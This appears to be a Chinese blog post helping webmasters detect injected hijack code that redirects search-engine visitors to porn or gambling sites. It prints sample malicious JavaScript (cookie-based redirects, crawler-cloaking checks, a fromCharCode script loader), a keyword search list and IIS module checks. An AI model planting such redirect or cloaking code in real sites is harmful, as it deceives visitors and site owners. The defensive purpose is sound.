假如你的网站被黑了，几次打开网页时显示跳转到色情网站或赌博网站，再打开时却正常。
请注意查一下网站页面是否有类似于以下的代码：

var c = document.cookie;      if (c.indexOf('isfirstvisited=false') != -1) {             }      else {          var d = new Date();          d.setFullYear(d.getFullYear() + 1);          document.cookie = 'isfirstvisited=false;expires=' + d.toGMTString();          location = 'https://baidu.com'      }

这是以JS为例子，如果被植入的木马在PHP中，大致雷同。
请务必进行全站搜索相关关键词isfirstvisited、indexOf、navigator、userAgent、fromCharCode、createElement、&#等
同时看一下后台数据库中或模板文件中被加的语句：
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf('baidu') == -1)
这个是判断用通过百度收录打开网站才跳转到其他网站

检查网站页面中script代码中是否有可疑的js代码或者是外联JS

另外一种：

<script>     if (!navigator.userAgent.match(/baiduspider|sogou|360spider|yisou/i)) {         document.title = "正常的标题";     } </script>

根据访问者是否为特定爬虫来决定是否动态设置页面标题。这就是为了迷惑网站管理人员的，当你直接打开网页的时候，显示正常的标题，当你通过搜索引擎打开就显示他附加的另外的代码设置的标题，然后进行跳转，通常伴有内似下面的代码：

<noscript><title>&#…</title> <meta name="keywords" content="&#…"/> <meta name="description" content="&#…"/></noscript> <script type="text/javascript">;var bc = String.fromCharCode(104,106,115等一串数字实际上是生成一个动态JS); var script = document.createElement('script'); script.src = bc; document.head.appendChild(script);</script

网站被劫持种类：
1、硬件劫持（路由器、交换机、网关、硬件驱动等）
2、运营商劫持（不必多言）
3、网站代码劫持（当前案例都算代码劫持-上面就属于代码劫持）
4、服务器被注入dll全局的组件加载
5、你本地电脑篡改劫持（hosts、驱动、注册表等--这个一般很少）
劫持可做到：
1、随机时间劫持
2、定时劫持（如凌晨4点-6点，其他时间正常）
3、指定地区劫持（你公司在深圳，除了深圳不劫持、其他地区都劫持）
4、百度或其他搜索引擎打开网站才劫持

服务器被全局组件加载判断方法：
查找：
windows/system32/inetsrv/config下的
applicationHost.config文件，
重点查看:
全局配置：
<globalModules>
模块配置：
<modules>
下是否有被异常add name
以及
<globalModules>
<modules>
这两个配置的头部或者尾部有无被添加新的组件链接